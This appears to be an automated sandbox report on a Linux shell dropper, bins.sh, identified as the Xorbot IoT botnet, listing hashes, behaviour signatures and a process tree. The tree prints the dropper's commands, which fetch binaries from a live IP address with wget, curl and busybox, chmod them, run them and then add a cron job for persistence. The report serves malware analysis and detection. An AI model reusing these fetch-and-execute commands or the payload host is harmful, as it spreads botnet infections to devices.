Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    02-12-2024 19:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    0b5635532d2f1fa548c3a52df6cafeb3

  • SHA1

    28fad0a1c84fa6e72b1212c0ac1324440c690b1a

  • SHA256

    04395ad444da152645554affea085999878fe2808aecd53798bd73c2b5a10d50

  • SHA512

    ce1b43efa4c05530b1e6cd86b6d02519bce2048be45bf0c61f59028ebd8a3aca058c4c3d827401cd1e5d5433ab3bc595204472266f880252124a1673e4e94ce7

  • SSDEEP

    192:oDuwScugogdt0DVY5BLMQIguwScugog3Z5BLMQw:oNaDVY5BLMQI45BLMQw

Score
10/10
xorbotantivmbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 3 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (795) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 4 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:661
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:669
        • /usr/bin/wget
          wget http://216.126.231.240/bins/kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          2⤵
          • Writes file to tmp directory
          PID:671
        • /usr/bin/curl
          curl -O http://216.126.231.240/bins/kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:686
        • /bin/busybox
          /bin/busybox wget http://216.126.231.240/bins/kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          2⤵
          • Writes file to tmp directory
          PID:693
        • /bin/chmod
          chmod 777 kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          2⤵
          • File and Directory Permissions Modification
          PID:695
        • /tmp/kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          ./kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          2⤵
          • Executes dropped EXE
          PID:696
        • /bin/rm
          rm kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
          2⤵
            PID:698
          • /usr/bin/wget
            wget http://216.126.231.240/bins/ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            2⤵
            • Writes file to tmp directory
            PID:699
          • /usr/bin/curl
            curl -O http://216.126.231.240/bins/ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:700
          • /bin/busybox
            /bin/busybox wget http://216.126.231.240/bins/ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            2⤵
            • Writes file to tmp directory
            PID:703
          • /bin/chmod
            chmod 777 ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            2⤵
            • File and Directory Permissions Modification
            PID:706
          • /tmp/ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            ./ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            2⤵
            • Executes dropped EXE
            PID:708
          • /bin/rm
            rm ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
            2⤵
              PID:710
            • /usr/bin/wget
              wget http://216.126.231.240/bins/p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              2⤵
              • Writes file to tmp directory
              PID:712
            • /usr/bin/curl
              curl -O http://216.126.231.240/bins/p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              2⤵
              • Checks CPU configuration
              • Writes file to tmp directory
              PID:725
            • /bin/busybox
              /bin/busybox wget http://216.126.231.240/bins/p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              2⤵
              • Writes file to tmp directory
              PID:736
            • /bin/chmod
              chmod 777 p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              2⤵
              • File and Directory Permissions Modification
              PID:743
            • /tmp/p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              ./p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              2⤵
              • Executes dropped EXE
              PID:745
            • /bin/rm
              rm p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
              2⤵
                PID:747
              • /usr/bin/wget
                wget http://216.126.231.240/bins/Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                2⤵
                • Writes file to tmp directory
                PID:750
              • /usr/bin/curl
                curl -O http://216.126.231.240/bins/Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                2⤵
                • Checks CPU configuration
                • Writes file to tmp directory
                PID:787
              • /bin/busybox
                /bin/busybox wget http://216.126.231.240/bins/Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                2⤵
                • Writes file to tmp directory
                PID:792
              • /bin/chmod
                chmod 777 Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                2⤵
                • File and Directory Permissions Modification
                PID:793
              • /tmp/Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                ./Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                2⤵
                • Executes dropped EXE
                • Renames itself
                • Reads runtime system information
                PID:794
                • /bin/sh
                  sh -c "crontab -l"
                  3⤵
                    PID:796
                    • /usr/bin/crontab
                      crontab -l
                      4⤵
                        PID:797
                    • /bin/sh
                      sh -c "crontab -"
                      3⤵
                        PID:798
                        • /usr/bin/crontab
                          crontab -
                          4⤵
                          • Creates/modifies Cron job
                          • Reads runtime system information
                          PID:799
                    • /bin/rm
                      rm Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                      2⤵
                        PID:804
                      • /usr/bin/wget
                        wget http://216.126.231.240/bins/FQzPhQANFQFeZ84bzQy5gM4fDCUL6g5RFK
                        2⤵
                          PID:807

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/Y4AN11xKNimY2VT9yNnEedj6M2jg4cq1Lb
                        Filesize

                        177KB

                        MD5

                        786d75a158fe731feca3880f436082c0

                        SHA1

                        79ea2734e43d00cdeabed5586b2c1994d02aef3e

                        SHA256

                        5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                        SHA512

                        7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                        Download Submit

                      • /tmp/ZIVpSCKgDPy3F4108ffmKfay9IWNC4FbFI
                        Filesize

                        112KB

                        MD5

                        05d7857dcead18bbd86d2935f591873c

                        SHA1

                        34d18f41ef35f93d5364ce3e24d74730a4e91985

                        SHA256

                        2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                        SHA512

                        d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                        Download Submit

                      • /tmp/kcsz25y7FmrOU4pCyKCn2Y0nrr6KfjZatL
                        Filesize

                        107KB

                        MD5

                        eb9c3a0de91fcf16ba17cb24608df68c

                        SHA1

                        09d95a7d70d5e115d103be51edff7c498d272fac

                        SHA256

                        dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                        SHA512

                        9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                        Download Submit

                      • /tmp/p33qkY1gklk5rgaxEEe52mbg2OzLbdg0oH
                        Filesize

                        99KB

                        MD5

                        9438d9bc392bcf300a5583b6df5bc8f6

                        SHA1

                        375a6ae34b516f6f3eeea8030c4084f585017efa

                        SHA256

                        68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                        SHA512

                        1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                        Download Submit

                      • /var/spool/cron/crontabs/tmp.v9nFYM
                        Filesize

                        210B

                        MD5

                        bf7c4f95725fee05d91b4d67c9e493db

                        SHA1

                        5577579d1e7e74e01347b5eba5ee493d8c018f78

                        SHA256

                        9d4102781ffe557ad3fa5a928768290f4d15dd440ac690737b598e204eee1722

                        SHA512

                        f7e750cd101e0c9f552a098aa2d8a7e28efc19a0053de7f88ca6933a57471b8fbee162bc157559496c4a15a781bf8d98c64199b8176bdc24d257e551297cc909

                        Download Submit